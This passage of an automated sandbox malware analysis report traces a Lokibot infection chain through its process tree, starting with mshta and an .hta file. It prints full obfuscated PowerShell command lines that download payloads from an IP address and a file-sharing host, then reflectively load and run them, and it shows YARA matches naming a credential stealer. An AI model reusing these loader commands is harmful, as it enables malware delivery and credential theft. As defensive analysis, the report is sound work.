                                                                                                                2024-11-15 17:14:12 UTC8192INData Raw: f5 17 8a 82 41 04 1a 3d 88 ca 90 4d 93 77 de f0 35 13 c5 c2 ae d6 8d 89 ff 00 15 f2 30 b1 78 8a bb 02 49 1f 4c c5 cd 0f 0e 89 24 49 77 38 56 e0 2d 8b c0 d6 66 56 60 f2 1b 0b d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0
                                                                                                                Data Ascii: A=Mw50xIL$Iw8V-fV`lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV
                                                                                                                2024-11-15 17:14:12 UTC8192INData Raw: ce a4 3f 6a bf d3 03 3d d4 49 37 3d 46 3e 0a 6a 75 29 a7 99 76 ee 5f e1 7a 1e c2 c6 5d 20 d3 b1 33 29 06 36 16 bf c3 8a 68 a1 77 d4 c9 32 80 4a de d0 df df 00 7a b9 65 86 63 a7 40 49 1c 70 01 fe 99 55 81 fc 90 ce 08 37 76 57 fe 99 a3 0e 8a 45 69 24 99 48 95 bd 41 98 70 7e bd 3f 3c 5a 55 74 b4 92 d0 af 63 5d fd b9 c0 ab 7a 94 6d f4 8f e7 94 69 b6 45 d2 c9 f8 03 fc f2 63 06 30 54 8f 97 c7 f5 c9 78 dd 88 52 85 87 c3 01 33 a8 90 ca 3d 2b e9 3d 02 8f ed 9a c2 38 a7 41 b1 00 b1 dd 47 fe 9c 54 69 ae 45 42 a1 79 ef 8f b4 1b 2b cb 46 05 79 e0 5d e0 05 3c 2d e0 f5 6f 56 5e eb 5e f9 44 92 1d 1f 88 6e 2a 0c 6f 6a 6b f8 79 18 e3 6a 1d d7 60 85 81 61 c9 b0 3f 4b cc 49 6d 65 65 2a cc 70 3d 40 93 4e d1 5a ba 70 6e c7 43 98 9e 2f aa 4d 4c c9 1c 64 32 44 39 23 b9 c4 ca 06
                                                                                                                Data Ascii: ?j=I7=F>ju)v_z] 3)6hw2Jzec@IpU7vWEi$HAp~?<ZUtc]zmiEc0TxR3=+=8AGTiEBy+Fy]<-oV^^Dn*ojkyj`a?KImee*p=@NZpnC/MLd2D9#
                                                                                                                2024-11-15 17:14:12 UTC8192INData Raw: 19 20 31 34 3f 2c 66 0d 23 ea 25 11 c6 54 1a 24 96 3e 95 1e e4 f6 c7 64 d4 47 a3 88 e9 f4 84 33 91 52 4f b4 1b f8 2d f6 fd 70 33 e3 9d f4 cc 4c 64 ac 9d 37 0e df 2c a8 90 d1 b2 77 75 bc e0 42 df e1 3d fe 39 24 06 6f 4f 02 ba 7b de 05 d2 66 0c 0b 72 01 04 8b ea 31 90 11 c4 40 33 8d f0 bc 8d 66 fd 40 b5 7f 21 95 83 4b bb 4c fa 89 5b 64 6a a4 21 3c 6f 6a e0 0f ae 0c 6b 26 0a 10 37 a4 73 44 03 c7 26 be 5c e0 4c 88 86 05 7b 70 de 4e ee 7b 9d e5 7f 2a ca 4b 02 a9 d4 15 26 92 60 8a 7d c1 dd fd 86 73 6a 5d ac c8 c4 92 81 45 00 28 58 35 f2 ce 33 bb c6 c8 cd 60 90 c7 8a e8 0f eb ce 03 30 e9 f4 ec f1 19 09 a6 8f 70 4d c1 6d b7 6d ad c4 50 14 09 e7 da b2 f2 69 13 48 1a 60 86 cb 28 8c 12 29 6c 37 27 a8 3c a9 ae 47 4b e9 95 49 87 97 14 8e 53 f7 6b b1 63 da 08 73 64 f2
                                                                                                                Data Ascii: 14?,f#%T$>dG3RO-p3Ld7,wuB=9$oO{fr1@3f@!KL[dj!<ojk&7sD&\L{pN{*K&`}sj]E(X53`0pMmmPiH`()l7'<GKISkcsd
                                                                                                                2024-11-15 17:14:12 UTC8192INData Raw: 8d 12 2b 55 da 18 c6 77 30 ae 97 78 44 fb 4f ae 66 04 e9 b4 b6 a0 05 a4 6e 78 ff 00 7b 33 5d 01 27 8b f8 60 89 e6 80 aa c0 d7 7f b5 3e 22 b6 04 1a 6e 47 45 56 af af ab 00 ff 00 69 f5 93 28 47 48 a2 62 d6 cf 1a b0 35 55 c8 bc cd 2d bb e7 95 91 55 85 1e 78 c0 f5 d3 fd a1 9e 2f 09 d0 ea 91 20 dd 36 ff 00 c4 ad 56 ad 42 bf ae 55 fc 7b 52 9e 11 1e a1 a3 88 4b 34 84 27 a1 a9 90 75 6e bf e2 a1 99 1a d0 17 ec ff 00 83 82 c2 ee 6b 27 a0 1b 86 35 ac d3 b2 f8 57 86 47 33 a4 41 23 69 4c 8e de 90 18 d8 0a 07 24 8e f4 3f 2e b8 14 1f 69 b5 2a 4b 14 89 98 73 65 0f 1f 2e 71 7d 52 cf 28 1a 99 22 8e 1d c4 33 0b 55 66 b3 d4 29 36 7e 63 06 75 29 13 83 a6 89 55 bf fa 67 f5 35 fc 07 45 f7 f7 f8 e0 1c b3 ee 66 25 98 9b 66 63 64 9f 7c 06 f4 de 26 74 da 72 84 29 da 17 66 d4 2d d3
                                                                                                                Data Ascii: +Uw0xDOfnx{3]'`>"nGEVi(GHb5U-Ux/ 6VBU{RK4'unk'5WG3A#iL$?.i*Kse.q}R("3Uf)6~cu)Ug5Ef%fcd|&tr)f-
                                                                                                                2024-11-15 17:14:12 UTC8192INData Raw: 35 90 40 36 70 07 a7 85 a6 b5 46 21 af a6 6b 42 ba 65 85 43 c2 1d c1 a2 4f 1c f4 cc b8 24 97 47 a9 2a 16 9b f0 90 73 41 a1 4d 52 19 12 32 19 40 f5 06 22 fe 38 17 97 4b a6 d3 96 04 1d d3 50 5f 65 be 99 6d 24 5a 75 8a 30 da 8d cc c6 82 a7 a8 86 3f db 02 9a 39 93 55 a7 25 cc a8 db 5a 99 8d 81 79 ab ca 4f 2e 98 20 da 57 f0 81 c7 42 70 19 8b 44 a9 09 42 4b 7a a8 b1 5a fe 98 be bb 4b 09 85 52 b6 d5 9b f7 ae 72 ba 1d 63 b4 2d 6a 09 dd 42 87 60 2b 1c 31 79 f1 94 90 58 65 a2 0d f7 f9 60 61 47 04 72 c3 71 51 07 bf be 2a fa 6f de 6d 66 ba e7 e5 9a 6f a3 5d 04 33 49 bf 6c 65 c2 aa a1 3c 0e 96 6f 9e b8 03 6d 27 21 41 a0 18 e0 27 e4 08 98 79 6d 64 8b bf 6c 73 4a 5d 9d 90 ab 5a 8f c5 5c 13 93 2a 6d 03 6a 2d 93 5c f7 c3 2a b1 80 29 3b 4b 0e 0a 9b ac 0b a6 f4 60 0f 27 e3
                                                                                                                Data Ascii: 5@6pF!kBeCO$G*sAMR2@"8KP_em$Zu0?9U%ZyO. WBpDBKzZKRrc-jB`+1yXe`aGrqQ*omfo]3Ile<om'!A'ymdlsJ]Z\*mj-\*);K`'
                                                                                                                2024-11-15 17:14:12 UTC8192INData Raw: d7 5b e9 75 d4 e0 51 d1 92 d9 07 a0 22 b3 73 ee 07 f5 cb e8 d1 8e b6 20 f1 96 56 60 ac b5 da c5 e2 e1 de b6 ee 6a ae 97 db 08 24 71 65 18 a8 fc 44 29 3e fd 7a fc b0 1a 85 11 9e 26 64 2c 0c 2e cc 2c 8f 50 dd 5f c9 70 4f 0a 84 8f d4 15 8c 7b d9 98 1e 4e e2 3f 95 62 fb dd 54 00 ed ef 57 fd 32 a5 d8 9d c4 92 6a b9 c0 3e d4 68 a4 d8 37 10 ca 03 73 c0 a3 78 19 94 2c d2 28 e5 43 1a 3f 0b cb 2c 8c 80 84 6a b3 76 0d 7b e0 89 b0 6f de ef 02 01 a6 07 3d 1f d9 f9 f5 12 b4 e0 ca ec aa 14 00 cc 49 17 7d 39 f8 67 9d 03 9e 97 f0 cd bf b3 c5 c0 d4 ec 04 9f 49 e3 b7 e2 c0 d0 1a 86 8f c4 84 6d 24 a1 89 e0 5f 6c 67 52 ee cc 88 19 88 0e 7f 17 cb 38 bc 51 cc 1e 50 04 8f c5 d5 9a cb 6b 59 96 25 71 1b 1f 50 51 4b 81 83 3f 86 6a 67 f1 11 19 3b 95 89 20 fc 07 5c df d2 14 d0 e9 c4
                                                                                                                Data Ascii: [uQ"s V`j$qeD)>z&d,.,P_pO{N?bTW2j>h7sx,(C?,jv{o=I}9gIm$_lgR8QPkY%qPQK?jg; \
                                                                                                                2024-11-15 17:14:12 UTC8192INData Raw: db f8 72 8f ab 49 0c ca 5c 95 3a 68 a3 4b 06 89 1b 09 1f a3 1c 4a 45 65 0a 59 40 2c 2e 83 0f ef 95 da ce aa e1 45 92 c3 93 ec 01 fe b8 1b 53 4a 34 c4 cb 21 95 43 6b 16 60 8c a5 6b f1 13 c3 75 3c 8b af 71 80 3a 88 d3 6a 46 f0 84 09 33 7e ed 5a ad 93 68 bd dc dd 8c cc 58 26 76 0c b1 d8 65 df f8 b8 db 7b 6c fc 2f 2e 51 c2 3d 83 e6 29 55 db 57 60 82 41 bc 0d 09 f5 50 9d 2b 84 31 ab 34 4b 1b d2 b1 63 b4 2d ee 37 b6 bd 3d 86 24 4a ac 6e a1 9c 7a 95 94 37 42 00 23 91 ef ce 2e 1e ec d0 15 c1 f9 e4 02 d3 38 45 04 b3 10 05 7b e0 3c 5a 09 b4 fa 7d fa 88 d0 c5 19 57 42 ad b8 9d cc dc 50 ae fe f8 64 f1 08 9b 54 da 96 11 6e 5d 43 4c 37 86 be 4a 90 06 d2 01 3e 9e e4 66 72 c1 3b 48 a8 a0 33 35 d2 86 06 c8 e4 83 f1 ca 88 24 16 c1 54 d7 45 2c 2c f6 34 2e ce 03 d3 f9 6b a5
                                                                                                                Data Ascii: rI\:hKJEeY@,.ESJ4!Ck`ku<q:jF3~ZhX&ve{l/.Q=)UW`AP+14Kc-7=$Jnz7B#.8E{<Z}WBPdTn]CL7J>fr;H35$TE,,4.k
                                                                                                                2024-11-15 17:14:12 UTC8192INData Raw: ea f7 c4 63 8d 91 61 90 0b 3b d8 57 fc 2b 8c ce f2 30 0b 1f 04 8c 0a 13 64 ee 16 33 8c 4a ca 59 78 38 36 49 43 80 09 62 47 35 8e 40 ac ab 4d 5f 1c 0f 3d a8 8e fc 63 a5 f0 b6 7d ba 62 fe 20 a5 dd 12 c3 05 04 0a f6 e3 34 75 30 b0 f1 26 65 23 d5 b7 9b ed 43 03 3e 9c a0 42 54 7a 83 72 3b d8 c0 5a 5d 38 ff 00 66 c6 6c 9a a0 c0 0e 3a 8c 5f 4b a3 47 9a 47 dc 54 46 6d 68 f2 73 4a 99 74 2d 43 b0 02 c7 eb 89 2c 54 49 22 fe 5c 60 2d ae 8d 5a 65 20 35 6d aa 3d 7a 9c d2 96 05 9a 17 55 6d c4 02 68 8b e7 da b1 59 93 7b 86 f5 6d ac 70 90 15 c8 52 24 22 94 a9 ed 56 3f 5c 0c 79 50 6e 05 15 59 56 b9 0b 42 f9 24 65 5c b1 66 05 55 43 30 6b 0a 0e 3a f1 5b 72 85 58 fe 2a e8 70 26 23 7e f8 01 48 12 52 06 fd ac cd 4c 58 71 5f 0c 98 a0 f2 9f 74 a8 4c 4d 6b be aa be 38 54 88 a9 f6
                                                                                                                Data Ascii: ca;W+0d3JYx86ICbG5@M_=c}b 4u0&e#C>BTzr;Z]8fl:_KGGTFmhsJt-C,TI"\`-Ze 5m=zUmhY{mpR$"V?\yPnYVB$e\fUC0k:[rX*p&#~HRLXq_tLMk8T


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:12:13:59
                                                                                                                Start date:15/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:mshta.exe "C:\Users\user\Desktop\bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta"
                                                                                                                Imagebase:0x4b0000
                                                                                                                File size:13'312 bytes
                                                                                                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:12:13:59
                                                                                                                Start date:15/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"
                                                                                                                Imagebase:0xd20000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:12:13:59
                                                                                                                Start date:15/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:12:14:00
                                                                                                                Start date:15/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT
                                                                                                                Imagebase:0xd20000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:4
                                                                                                                Start time:12:14:04
                                                                                                                Start date:15/11/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"
                                                                                                                Imagebase:0x8c0000
                                                                                                                File size:2'141'552 bytes
                                                                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:12:14:04
                                                                                                                Start date:15/11/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF0FC.tmp" "c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP"
                                                                                                                Imagebase:0xff0000
                                                                                                                File size:46'832 bytes
                                                                                                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:12:14:08
                                                                                                                Start date:15/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS"
                                                                                                                Imagebase:0x860000
                                                                                                                File size:147'456 bytes
                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:12:14:09
                                                                                                                Start date:15/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                Imagebase:0xd20000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:8
                                                                                                                Start time:12:14:09
                                                                                                                Start date:15/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:9
                                                                                                                Start time:12:14:09
                                                                                                                Start date:15/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"
                                                                                                                Imagebase:0xd20000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:13
                                                                                                                Start time:12:14:26
